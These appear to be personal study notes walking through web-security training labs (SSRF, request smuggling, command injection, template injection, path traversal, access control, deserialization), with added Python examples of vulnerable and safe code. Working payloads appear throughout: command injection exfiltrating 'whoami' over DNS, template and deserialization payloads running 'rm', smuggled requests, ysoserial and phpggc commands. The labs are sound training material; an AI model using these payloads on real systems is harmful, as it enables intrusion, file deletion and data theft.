Open the avatar image in a new tab to read the hostname.

Server-side request forgery

1.Basic SSRF against the local server

Loopback means localhost. Change the stockApi parameter to http://localhost/admin to see the admin panel, then to http://localhost/admin/delete?username=carlos

2.Basic SSRF against another back-end system

Send the stock check to Intruder with stockApi=http://192.168.0.§1§:8080/admin and iterate the last octet. Select the IP that returns 200, send that request to Repeater and append /delete?username=carlos.

3.SSRF with blacklist-based input filter

The strings localhost and 127.0.0.1 are blocked, but http://127.1/ gets through and shows the admin panel. There is another problem: adding admin after the IP is blocked as well, and the response shows why: the filter looks for the string admin, while the back end URL-decodes the value, sometimes twice, so double-URL-encode a character (http://127.1/%2561dmin) to get past it.

4.SSRF with filter bypass via open redirection vulnerability

The earlier tricks do not work here because the stockApi value is validated as a path on the same host, not as a full URL, so localhost and the like are rejected. (Ctrl+U in Repeater URL-encodes the selection.)

Identification: the stock check of the first product does not contain a URL, it shows a path. The "next product" link has an open redirect in its path parameter; we confirmed it by pointing it at google.com. Now give that next-product path to the stockApi parameter, put the internal IP plus admin (http://192.168.0.12:8080/admin) in the redirect parameter, and URL-encode it. Then repeat with /admin/delete?username=carlos.

5.Blind SSRF with out-of-band detection

Put a Burp Collaborator URL in the Referer header of a product page request; the server fetches the Referer URL for analytics and the DNS/HTTP interaction shows up in Collaborator.


Http Request Smuggling

1.HTTP request smuggling, basic CL.TE vulnerability

The front end delimits the request with Content-Length, the back end with Transfer-Encoding: chunked, so the two disagree about where the request ends. Send the request to Repeater, downgrade it to HTTP/1.1, change the method to POST, and give it both headers with this body (the active scan reports the same issue):

Content-Length: 6
Transfer-Encoding: chunked

0

G

Send it twice: the front end forwards all 6 bytes, the back end stops at the 0 chunk and leaves G on the connection, so it is prepended to the next request, which becomes GPOST and is rejected as an unrecognized method.

2.HTTP request smuggling, basic TE.CL vulnerability

First send the request to Extensions > HTTP Request Smuggler > Smuggle probe; after a while you see the finding in the Target tab or the Dashboard. Send the request to Repeater, then Extensions > HTTP Request Smuggler > Smuggle attack and choose the type of attack you want to launch (TE.CL). Change the prefix from GET to GPOST, remove the Host header from the smuggled part and start the attack.

3.HTTP request smuggling, obfuscating the TE header

Extension > HTTP Request Smuggler > Smuggle probe
Extension > HTTP Request Smuggler > Smuggle attack (TE.CL)

This is the normal request; this is the modified one (the second Transfer-Encoding header is obfuscated so that only one of the two servers recognises it).

GPOST prefix, Collaborator part removed.

G was successfully smuggled.

4.HTTP request smuggling, confirming a CL.TE vulnerability via differential responses

Send to Repeater, change the request method from GET to POST and make sure it is HTTP/1 (downgrade from HTTP/2).

This is the normal request; the attack request carries a chunked body whose 0 chunk is followed by the start of a second request:

Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

(Content-Length covers the whole body; the back end stops at the 0 chunk and the rest becomes the prefix of the next request, where the X-Ignore header swallows that request's first line.) Send it twice and you will see the 404.

5.HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

Extension > HTTP Request Smuggler > Smuggle probe
Extension > HTTP Request Smuggler > Smuggle attack (TE.CL)

This is the normal request. Change GET to POST, put /404 as the smuggled path and remove the Collaborator part.
6.Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability

Extension > HTTP Request Smuggler > Smuggle probe

Send the request to Repeater. This is the normal request; the attack request is:

Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=

Send it twice: the smuggled GET /admin reaches the back end with Host: localhost, which the front end would have blocked. Repeat with GET /admin/delete?username=carlos.

7.Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Extension > HTTP Request Smuggler > Smuggle probe

This is the normal request. Make it HTTP/1 and change the request method from GET to POST. The attack request is:

Content-Length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The front end reads the chunked body (87 hex = 135 bytes, the length of the smuggled request up to and including x=1) and forwards everything; the back end reads only Content-Length: 4, i.e. the line "87", and treats the rest as the next request. Turn off Update Content-Length in Repeater, otherwise it overwrites the 4.

Or use the extension: Extensions > HTTP Request Smuggler > Smuggle attack (TE-CL) with the prefix

admin/delete?username=carlos
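Worked example, added here and not taken from the notes or the labs: two tiny body parsers (Content-Length and chunked) applied to the request bodies of labs 1 and 7, so you can see exactly which bytes each end keeps, with the chunk size 87 computed instead of counted by hand. The request bytes are the ones shown above; everything else is mine.

```python
"""How the two ends of a CL.TE / TE.CL pair delimit the same bytes.
Stand-alone re-implementation of the two body parsers, applied to the
request bodies from labs 1 and 7 above."""

def read_by_content_length(stream, length):
    """A Content-Length parser: the body is exactly `length` bytes."""
    return stream[:length], stream[length:]

def read_chunked(stream):
    """A Transfer-Encoding: chunked parser (no trailers): returns the
    dechunked body and whatever follows the terminating 0 chunk."""
    body, pos = b"", 0
    while True:
        eol = stream.index(b"\r\n", pos)
        size = int(stream[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            pos = stream.index(b"\r\n", pos) + 2    # empty line after the 0 chunk
            return body, stream[pos:]
        body += stream[pos:pos + size]
        pos += size + 2                             # chunk data plus its CRLF

def chunk(data):
    """Wrap data as one chunk followed by the terminating chunk."""
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(data), data)

# Lab 1 (CL.TE): sent with Content-Length: 6 and this body.
CLTE_BODY = b"0\r\n\r\nG"

def clte_leftover():
    forwarded, _ = read_by_content_length(CLTE_BODY, 6)   # front end: CL
    _, leftover = read_chunked(forwarded)                  # back end: TE
    return leftover        # b"G" stays on the socket and prefixes the next request

# Lab 7 (TE.CL): the request to smuggle; 0x87 = 135 bytes up to and including x=1.
SMUGGLED = (b"GET /admin/delete?username=carlos HTTP/1.1\r\n"
            b"Host: localhost\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 15\r\n"
            b"\r\n"
            b"x=1")

def tecl_chunk_size_hex():
    return "%x" % len(SMUGGLED)

def tecl_body():
    return chunk(SMUGGLED)

def tecl_leftover():
    wire = tecl_body()
    _, rest = read_chunked(wire)                     # front end: TE, forwards all of it
    assert rest == b""
    _, leftover = read_by_content_length(wire, 4)    # back end: CL = len("87\r\n")
    # leftover starts with the smuggled GET; its own Content-Length: 15 swallows
    # the trailing "\r\n0\r\n\r\n" plus the first 5 bytes of whatever comes next
    return leftover

if __name__ == "__main__":
    print(clte_leftover(), tecl_chunk_size_hex())
    print(tecl_leftover()[:50])
```

The same two functions explain why "send twice" works: the leftover is not a response to your request, it is unread input sitting on the back-end connection, and only the next request on that connection is affected.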

8.H2.CL request smuggling

Before starting, untick all extensions in Burp.

Send the home page request to Repeater (keep it HTTP/2) and change the request method to POST. In the Repeater tab untick Update Content-Length and tick Allow HTTP/2 ALPN override. Add the header and body below: the front end knows the body length from the HTTP/2 frames but passes Content-Length: 0 to the back end, which then treats the body as the start of the next request.

Content-Length: 0

GET /resources HTTP/1.1
Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Length: 5

x=1

Modify the request but do not send it yet; first host the malicious /resources response on the exploit server. Then send a few times until you get a 302 response: the back end redirects the smuggled GET /resources to the Host you supplied, so the victim's request is answered with a redirect to your exploit server. Change the Host value and keep sending until that 302 appears.

9.HTTP/2 request splitting via CRLF injection

In Repeater (HTTP/2; use the Inspector so the CRLFs are sent literally), add a header named foo with the value

bar\r\n
\r\n
GET /x HTTP/1.1\r\n
Host: YOUR-LAB-ID.web-security-academy.net

and change the path value to one that does not exist. The front end downgrades to HTTP/1.1 and the injected CRLFs split the header into a second request, so the back end answers the next user's request with the response meant for yours.

Send it a lot of times, until the response is a 302 (the admin's post-login redirect); take the session cookie from it and replace yours in the cookie editor.

10.HTTP/2 request smuggling via CRLF injection

Change the request method to POST and, via the Inspector, add a header whose value contains \r\nTransfer-Encoding: chunked, so that the downgraded HTTP/1.1 request is chunked for the back end. Body:

0

GET /dddddd HTTP/1.1
X-Ignore: x

Now send the home page request to Repeater as well. First send the POST, then the GET, and look at the GET's response: if it is a 404 (the smuggled /dddddd prefix), the site is vulnerable.

Now search for anything in the search box and send that request to Repeater; remove the unwanted headers like before. The browser shows a search history for your session, so a smuggled POST /?search= captures the start of the next user's request, cookies included, into that history. Check that it also works over HTTP/1.1; it does.

Copy the whole search request, remove the GET /dddddd prefix and paste the search request in its place. To find the Content-Length for the smuggled search request, select the whole request in Repeater (it is 920 here) and set the smuggled Content-Length to a value larger than the real body, so the victim's request is appended to the search term; update the search value accordingly.

Take the captured session from the search history and replace yours.

11.CL.0 request smuggling

This is the home page. Send the request to Repeater, downgrade it to HTTP/1.1 and change the request method from GET to POST. Remove the unwanted headers and disable Update Content-Length while you experiment: the back end ignores the Content-Length of this endpoint entirely (CL.0), so the body is treated as the start of the next request.

Once it is confirmed, set Update Content-Length back to automatic. Send the attack request 2 or 3 times until the follow-up request gets a 404.

Send the home page request to Repeater too, downgrade it to HTTP/1.1, add Connection: keep-alive and send it right after the attack request over the same connection (group the two tabs and send in sequence, single connection).


OS command injection

1.OS command injection, simple case

In the storeId parameter of the stock check: |whoami (also ls, pwd)

2.Blind OS command injection with time delays

In the email field of the feedback form (the command runs blind, so detect it by the delay):

||ping+-c+10+127.0.0.1||

3.Blind OS command injection with output redirection

Also send any image request (/image?filename=...) to Repeater, then redirect the command output into the web root:

||whoami>/var/www/images/output.txt||

and read it back with filename=output.txt

4.Blind OS command injection with out-of-band interaction

email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

5.Blind OS command injection with out-of-band data exfiltration

email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

(The backticks substitute the command output into the hostname, so the username arrives as the DNS subdomain in Collaborator.)
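Added example, not from the notes: the interpolation bug that all five labs exploit next to the argv form that makes the same input inert, using echo as a constructed stand-in for the lab's stock-report command so it runs anywhere with /bin/sh. The labs' ||cmd|| form only runs cmd when the preceding command fails, which is why the constructed payload uses a semicolon instead.

```python
"""Shell command injection: user input interpolated into a shell command line,
next to the argv form that passes the same input as a single argument."""
import subprocess

PAYLOAD = "1; echo INJECTED"     # constructed; ; | || & ` $() and newlines all work

def stock_check_vulnerable(product_id, store_id):
    # The values are pasted into a command line that /bin/sh parses, so every
    # shell metacharacter in them is interpreted (the labs' stockreport.pl bug).
    cmd = f"echo stock for product {product_id} store {store_id}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def stock_check_argv(product_id, store_id):
    # argv list and no shell: the metacharacters are just bytes in one argument.
    cmd = ["echo", "stock for product", product_id, "store", store_id]
    return subprocess.run(cmd, capture_output=True, text=True).stdout

def stock_check_safe(product_id, store_id):
    # Allow-list validation in front of the argv form; defence in depth.
    if not (product_id.isdigit() and store_id.isdigit()):
        raise ValueError("product and store ids must be numeric")
    return stock_check_argv(product_id, store_id)

def rejected(product_id, store_id):
    try:
        stock_check_safe(product_id, store_id)
        return False
    except ValueError:
        return True

def injected_lines(output):
    """Output lines beyond the first: anything here came from a second command."""
    return output.splitlines()[1:]

if __name__ == "__main__":
    print(repr(stock_check_vulnerable("1", PAYLOAD)))
    print(repr(stock_check_argv("1", PAYLOAD)))
```

Blind variants (labs 2 to 5) differ only in how the result gets out: a sleep you can time, a file you can fetch, or a DNS name Collaborator sees.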

Server-side template injection

1.Basic server-side template injection

The lab tells you it is ERB (Ruby); in a real case you need to test each template syntax (SSTI payload lists: book.hacktricks.xyz). The message parameter in the URL is rendered as a template, so give it a system command and URL-encode the payload (the previous value was URL-encoded as well):

<%= system("rm /home/carlos/morale.txt") %>

2.Basic server-side template injection (code context)

Take a closer look at the "preferred name" functionality: the blog-post-author-display value is placed inside a Tornado template expression, so close the expression with }} first, then add the template code:

{% import os %} {{os.system('rm /home/carlos/morale.txt')

blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')

3.Server-side template injection using documentation

You should try solving this lab using only the documentation (FreeMarker). However, if you get really stuck, you can try finding a well-known exploit by @albinowax that you can use to solve the lab:

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }

4.Server-side template injection in an unknown language with a documented exploit

Fuzz string to identify the engine: ${{<%[%'"}}%\
The error message names Handlebars; take the Handlebars payload from book.hacktricks.xyz:

wrtz{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('rm /home/carlos/morale.txt');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

URL-encode your exploit (take the payload above to Burp Decoder > Encode as URL) and add it as the value of the message parameter in the URL. The final exploit should look like this, but remember to replace YOUR-LAB-ID with your own lab ID:

https://YOUR-LAB-ID.web-security-academy.net/?
message=wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67
%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20
%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74
%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20
%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73
%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d
%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20
%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20
%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68
%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70
%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64
%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%68%6f%6d%65%2f
%63%61%72%6c%6f%73%2f%6d%6f%72%61%6c%65%2e%74%78%74%27%29%3b%22%7d%7d%0d%0a%20
%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20
%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20
%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62
%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20
%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%20%20
%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61
%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20
%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b
%7b%2f%77%69%74%68%7d%7d
5.Server-side template injection with information disclosure via user-supplied objects

Fuzz string: ${{<%[%'"}}%\

The error messages show the engine is the Django template language (Python). Note that Django's own template engine is not Jinja2, even though the {{ }} and {% %} syntax looks the same, and only a Django template accepts these tags:

{% debug %}

{{settings.SECRET_KEY}}

Other identification probes: {{44}}[[55]] and {{7*'7'}} (in Jinja2 {{7*'7'}} renders 7777777, in Twig 49; the Django engine raises a template error on arithmetic).

Path traversal

1.File path traversal, simple case

Open an image in a new tab to get the /image?filename= request. This is the normal request; replace the filename with:

../../../etc/passwd

2.File path traversal, traversal sequences blocked with absolute path bypass

/etc/passwd

3.File path traversal, traversal sequences stripped non-recursively

The filter removes ../ once, so a sequence that turns into ../ after one removal survives:

....//....//....//etc/passwd

4.File path traversal, traversal sequences stripped with superfluous URL-decode

The filter runs before the parameter is URL-decoded a second time, so double-encode the slashes:

..%252f..%252f..%252fetc/passwd

5.File path traversal, validation of start of path

The filename must start with the expected base directory, so the normal request becomes:

/var/www/images/../../../etc/passwd

6.File path traversal, validation of file extension with null byte bypass

The filename must end in an image extension: the check sees .jpg, but the file API stops at the null byte:

../../../etc/passwd%00.jpg
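As an added example (not the notes' code; BASE is assumed from the lab hint /var/www/images), here are the filters of labs 2 to 6 reproduced as functions, next to a resolver that normalises and confines instead of stripping. Note that the lab 3 and lab 4 payloads are harmless against the safe resolver not because they are blocked but because, decoded once and normalised, they simply name files under BASE that do not exist.

```python
"""Path traversal filters from the labs, reproduced as functions, beside a
resolver that normalises and confines instead of stripping."""
import posixpath
from urllib.parse import unquote

BASE = "/var/www/images"     # the image directory the lab hints at (assumed)

def strip_once(name):              # lab 3: "../" removed once, not recursively
    return name.replace("../", "")

def strip_recursive(name):
    while "../" in name:
        name = name.replace("../", "")
    return name

def join_then_normalise(name):     # labs 2 and 5: no confinement to BASE
    return posixpath.normpath(posixpath.join(BASE, name))

def lab4_filter(name):
    """Decodes once, looks for ../, then a later layer decodes again."""
    if "../" in unquote(name):
        raise ValueError("blocked")
    return join_then_normalise(unquote(unquote(name)))

def lab6_filter(name):
    """Checks the extension on the decoded string; the C path API the file is
    opened with stops at the first NUL byte."""
    decoded = unquote(name)
    if not decoded.endswith(".jpg"):
        raise ValueError("blocked")
    return join_then_normalise(decoded).split("\x00", 1)[0]

def safe_resolve(name):
    """Decode exactly once, reject NUL and backslash, normalise, then require
    the result to stay under BASE. Nothing is stripped, so there is nothing
    to bypass: '....//' just becomes a file literally named '....'."""
    decoded = unquote(name)
    if "\x00" in decoded or "\\" in decoded:
        raise ValueError("bad character")
    full = posixpath.normpath(posixpath.join(BASE, decoded))
    if full != BASE and not full.startswith(BASE + "/"):
        raise ValueError("traversal")
    return full

def is_confined(name):
    try:
        return safe_resolve(name).startswith(BASE + "/")
    except ValueError:
        return False

if __name__ == "__main__":
    for p in ("../../../etc/passwd", "/etc/passwd", "....//....//....//etc/passwd",
              "..%252f..%252f..%252fetc/passwd", "../../../etc/passwd%00.jpg"):
        print(p, is_confined(p))
```

posixpath.join discards BASE when the second argument is absolute, which is the whole of lab 2 in one line; the confinement check after normpath is what catches it.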

Access control vulnerabilities

1.Unprotected admin functionality

/robots.txt discloses the admin path:
/administrator-panel

2.Unprotected admin functionality with unpredictable URL

The admin URL is not linked, but it is disclosed in the JavaScript of the home page (view the source and search for admin).

3.User role controlled by request parameter

In the POST /login response the Admin cookie is set to false next to the session cookie, so in the cookie editor change Admin=false to true and open /admin.

4.User role can be modified in user profile

The change-email response echoes a roleid field; add "roleid":2 to the JSON body of the change-email request and the role changes.

5.User ID controlled by request parameter

/my-account?id=wiener: change the id parameter to the victim's username.

6.URL-based access control can be circumvented

The front end blocks /admin by path, but the back end honours an X-Original-URL header, which is identified here. Send GET / with X-Original-URL: /admin and it shows the admin panel; then X-Original-URL: /admin/delete with ?username=carlos in the request line's query string.

7.Method-based access control can be circumvented {important}

There are admin and normal user credentials; log in with both. The admin has a privilege-escalation feature (upgrade a user); take that request. As the normal user the POST is rejected, but the same action sent as a GET is not checked:

GET /admin-roles?username=wiener&action=upgrade

8.Multi-step process with no access control on one step

Same as above, with one change: the first step (the upgrade request) is access-controlled, but the confirmation step is not. Take this request from the admin session, replace the session cookie with the normal user's and send it:

POST /admin-roles HTTP/2
Host: 0a4300880440e0c1810a0813000b00c1.web-security-academy.net
Cookie: session=pVhRljK4Og29RhGGHyVi60kDMqLr3uIW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://0a4300880440e0c1810a0813000b00c1.web-security-academy.net
Dnt: 1
Referer: https://0a4300880440e0c1810a0813000b00c1.web-security-academy.net/admin-roles
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

action=upgrade&confirmed=true&username=wiener

9.Referer-based access control

The upgrade request is allowed whenever the Referer header points at the admin page, so as the normal user add:

Referer: https://0ab400df04030d7c8044c13600660083.web-security-academy.net/admin

Authentication

1.Username enumeration via different responses

First brute-force the username field (Intruder, Sniper; look for the response that differs, "Incorrect password" instead of "Invalid username"), then the password for that username.

2.2FA simple bypass

After entering the password, skip the 2FA page and browse straight to /my-account.

3.Password reset broken logic

"Please check your email for a reset password link." The reset token is neither tied to nor validated against the user: delete the temp-forgot-password-token values and change the username parameter of the reset POST to the victim's.

4.Username enumeration via subtly different responses

Copy and paste the username list into Intruder. Copy the sentence "Invalid username or password." into a Grep - Extract item (the trailing dot must be copied too): the one username whose message lacks the final dot is valid. Similarly for the password field, but this time grep is probably not needed (look at the status code).

5.Username enumeration via response timing

Run Param Miner in Burp; if you are lucky it identifies the header, otherwise use the one below to change the apparent source IP, because the lab blocks an IP after too many failures:
X-Forwarded-For

Put in a very long password (the server only hashes it when the username exists, so valid usernames take longer) and select Pitchfork in Intruder.

Select two positions, the last byte of the X-Forwarded-For value (a number sequence, so every request comes from a new IP) and the username, and give the usernames.

In Columns enable Response received and Response completed so the timing is visible after the attack; the slow responses are the valid usernames.

Send that to Repeater, then to Intruder again: re-arrange the IP position, select the password position and attack with the found username until you get a 302.
6.Broken brute-force protection, IP block

This lab is vulnerable due to a logic flaw in its password brute-force protection. To
solve the lab, brute-force the victim's password, then log in and access their account page.

Your credentials: wiener:peter

Victim's username: carlos

Candidate passwords

{in this lab we have our credentials & only know the victim's username; to brute-force the
password we do as below}
1st give wrong credentials, capture that & send to Intruder,
like this we need to give 1st our username & 2nd the victim's,
1st password is our own, 2nd one is what we have to brute-force,
create a custom resource pool that sends one request at a time

look in the 302, there is a difference,,,, show response in browser...

7.Username enumeration via account lock


Send the POST /login request to Burp Intruder.

Select the attack type Cluster bomb. Add a payload position to the username
parameter. Add a blank payload position to the end of the request body by clicking Add §
twice. The result should look something like this:
username=§invalid-username§&password=example§§

On the Payloads tab, add the list of usernames to the first payload set. For the
second set, select the Null payloads type and choose the option to generate 5 payloads. This
will effectively cause each username to be repeated 5 times. Start the attack.
check the length column
You have made too many incorrect login attempts. Please try again in 1 minute(s).

Invalid username or password.

we successfully found the username; it's time to find the password


8.2FA broken logic

1st log in with your own account & see the functionality


send both requests to Repeater
look there for the 302 response in the attack,
show response in browser

9.Brute-forcing a stay-logged-in cookie


show response in browser

10.Offline password cracking

This lab stores the user's password hash in a cookie. The lab also contains an XSS
vulnerability in the comment functionality. To solve the lab, obtain Carlos's stay-logged-
in cookie and use it to crack his password.

Go to one of the blogs and post a comment containing the following stored XSS payload,
remembering to enter your own exploit server ID:

{put the XSS payload in the comment field; then decode the secret found in the access log}

11.Password reset poisoning via middleware


X-Forwarded-Host

X-Forwarded-Host header is supported and you can use it to point the dynamically
generated reset link to an arbitrary domain

replace the token with the actual one

12.Password brute-force via password change


WebSockets
1.Manipulating WebSocket messages to exploit vulnerabilities
you'll get a pop-up

2.Manipulating the WebSocket handshake to exploit vulnerabilities


X-Forwarded-For: 1.1.1.1
3.Cross-site WebSocket hijacking
Web cache poisoning
1.Web cache poisoning with an unkeyed header
send the request twice

send this to Param Miner > Guess headers

here X-Forwarded-Host is the unkeyed header it found


show response in browser

2.Web cache poisoning with an unkeyed cookie

refresh the page a 2nd time; you see a difference in the request


-alert(1)-"

show response in browser

3.Web cache poisoning with multiple headers


refresh browser,

4.Targeted web cache poisoning using an unknown header

Param Miner > Guess headers


5.Web cache poisoning via an unkeyed query string
'/><script>alert(1)</script>

request in browser

6.Web cache poisoning via an unkeyed query parameter

Param Miner > Guess GET parameters


7.Parameter cloaking

Param Miner > Guess GET parameters


GET /js/geolocate.js?callback=setCountryCookie&utm_content=foo;callback=arbitraryFunction
show response in browser

8.Web cache poisoning via a fat GET request

callback=alert(0)

9.URL normalization
random</p><script>alert(1)</script><p>

Insecure deserialization
1.Modifying serialized objects

it's normal
2.Modifying serialized data types
similar to above

here I changed the username string to 13 because "administrator" is 13 characters, & removed the


access token string; in its place I put an integer & set it to 0.

3.Using application functionality to exploit [insecure deserialization]

here we need 2 accounts


take this session & paste it in the POST delete request, replacing the session

here I changed the string & path to the file I want to delete

4.Arbitrary object injection in PHP

sometimes we can't modify here; look in the Target section


You can sometimes read source code by appending a tilde ( ~) to a filename to retrieve an
editor-generated backup file.

O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}
5.Exploiting Java deserialization with Apache Commons

actively scan this host

open Kali, download ysoserial,

In Java versions 16 and above, you need to set a series of command-line arguments for Java to run
ysoserial. The --add-opens flags are JVM options, so they go before -jar; anything after the jar
name is passed to ysoserial itself. For example:

java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
     --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
     --add-opens=java.base/java.net=ALL-UNNAMED \
     --add-opens=java.base/java.util=ALL-UNNAMED \
     -jar ysoserial-all.jar [payload] '[command]'

6.Exploiting Java deserialization with Apache Commons


if you find rO0 at the start of the (base64) cookie, use ysoserial

In Java versions 16 and above:

java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
     --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
     --add-opens=java.base/java.net=ALL-UNNAMED \
     --add-opens=java.base/java.util=ALL-UNNAMED \
     -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64

In Java versions 15 and below:

java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64

copy all of it & paste it in Burp Decoder, then URL-encode

7.Exploiting PHP deserialization with a pre-built gadget chain


Internal Server Error: Symfony Version: 4.3.6

remove part of the cookie, see the error & send the home page request to Repeater; in the response
section look for keywords like --
https://github.com/ambionics/phpggc

./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64


this output is the object

You now need to construct a valid cookie containing this malicious object and sign it
correctly using the secret key you obtained earlier. You can use the following PHP script to
do this. Before running the script, you just need to make the following changes:

Assign the object you generated in PHPGGC to the $object variable.

Assign the secret key that you copied from the phpinfo.php file to the $secretKey
variable.

<?php
$object = "OBJECT-GENERATED-BY-PHPGGC";
$secretKey = "LEAKED-SECRET-KEY-FROM-PHPINFO.PHP";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;

This will output a valid, signed cookie to the console.

service apache2 start

http://localhost/phpexploit.php

8.Exploiting Ruby deserialization using a documented gadget chain


decode as base64
# autoload the classes the chain needs
Gem::SpecFetcher
Gem::Installer
# prevent the payload from running when we Marshal.dump it
module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "id")   # the command string handed to Kernel#system
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts payload.inspect
puts Marshal.load(payload)

https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
https://onecompiler.com/ruby/3zxkkqk8e

take the output & paste it in the cookie value

this is the payload

BAhbCGMVR2VtOjpTcGVjRmV0Y2hlcmMTR2VtOjpJbnN0YWxsZXJVOhVHZW06%0D%0AOlJlcXVpcmVtZW50WwZvOhxHZW06OlBhY2thZ2U6OlRhclJlYWRlcgY6CEBp%0D%0Ab286FE5ldDo6QnVmZmVyZWRJTwc7B286I0dlbTo6UGFja2FnZTo6VGFyUmVh%0D%0AZGVyOjpFbnRyeQc6CkByZWFkaQA6DEBoZWFkZXJJIghhYWEGOgZFVDoSQGRl%0D%0AYnVnX291dHB1dG86Fk5ldDo6V3JpdGVBZGFwdGVyBzoMQHNvY2tldG86FEdl%0D%0AbTo6UmVxdWVzdFNldAc6CkBzZXRzbzsOBzsPbQtLZXJuZWw6D0BtZXRob2Rf%0D%0AaWQ6C3N5c3RlbToNQGdpdF9zZXRJIh9ybSAvaG9tZS9jYXJsb3MvbW9yYWxl%0D%0ALnR4dAY7DFQ7EjoMcmVzb2x2ZQ%3D%3D

or you can modify it in Burp Repeater

Information disclosure
1.Information disclosure in error messages

normal
2.Information disclosure on debug page
in the search bar search for some keywords like {secret, password, api, users}

3.Source code disclosure via backup files

go to Engagement tools > Discover content, run session


4.Authentication bypass via [information disclosure]
5.Information disclosure in version control history
